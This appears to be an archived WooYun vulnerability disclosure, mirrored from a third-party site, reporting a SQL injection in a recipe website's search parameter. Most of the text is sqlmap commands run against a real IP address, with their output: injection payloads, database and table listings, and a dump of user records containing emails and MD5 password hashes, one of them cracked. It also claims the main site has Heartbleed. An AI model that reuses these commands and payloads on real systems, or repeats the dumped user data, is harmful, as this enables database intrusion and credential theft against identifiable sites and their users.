乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-08: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-23: 厂商已经主动忽略漏洞,细节向公众公开
以后妈妈再也不用愁我不会做饭了。
http://www.xibao360.com/
D:\Python27\sqlmap>sqlmap.py -u "http://121.40.212.164/search/?q=1" --dbs --batch---Parameter: q (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: q=1%' AND 1962=1962 AND '%'=' Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: q=1%' AND (SELECT 8058 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(8058=8058,1))),0x716b627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: q=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))bQEW) AND '%'='---available databases [11]:[*] cdcol[*] data[*] data_caipu[*] information_schema[*] mysql[*] performance_schema[*] phpmyadmin[*] test[*] webauth[*] yinshi[*] yinshi_temp
比较关心data_caipu,试试看
D:\Python27\sqlmap>sqlmap.py -u "http://121.40.212.164/search/?q=1" -D data_caipu --tables --batchDatabase: data_caipu[26 tables]+---------------+| ys_art || ys_art_grade || ys_ask || ys_caipu || ys_cat || ys_category || ys_comment || ys_cookbook || ys_follow || ys_health || ys_knowlage || ys_link || ys_look || ys_love || ys_message || ys_nav2 || ys_nav_3 || ys_nav_7 || ys_nav_seo || ys_page || ys_shiliao || ys_shoucang || ys_slide || ys_user || ys_user_level || ys_web |+---------------+
dump点数据出来
D:\Python27\sqlmap>sqlmap.py -u "http://121.40.212.164/search/?q=1" -D data_caipu -T ys_user --dump --stop 3 --batchDatabase: data_caipuTable: ys_user[3 entries]+-----+-----+------+----------+------+-----------------------+-------------------+------------+---------+---------+-------------------------------------------+----------+| uid | hit | url | name | love | photo | email | date | level | chufang | password |qianming |+-----+-----+------+----------+------+-----------------------+-------------------+------------+---------+---------+-------------------------------------------+----------+| 1 | 568 | NULL | 饭桶 | 0 | Upload/nophotobig.jpg | [email protected]om | 1438056321 | 1 | 厨房 | a1aded0db590352c29f5109fc52331e2 | NULL || 2 | 485 | NULL | tianqi | 0 | Upload/nophotobig.jpg | [email protected] | 1439261954 | 1 | 厨房 | e10adc3949ba59abbe56e057f20f883e (123456)| NULL || 3 | 495 | NULL | dgcbeyqr | 0 | Upload/nophotobig.jpg | [email protected] | 1438056000 | 1 | 厨房 | d41d8cd98f00b204e9800998ecf8427e ()| NULL |+-----+-----+------+----------+------+-----------------------+-------------------+------------+---------+---------+-------------------------------------------+----------+
最后还发现了主站存在心脏滴血漏洞
如上
null
未能联系到厂商或者厂商积极拒绝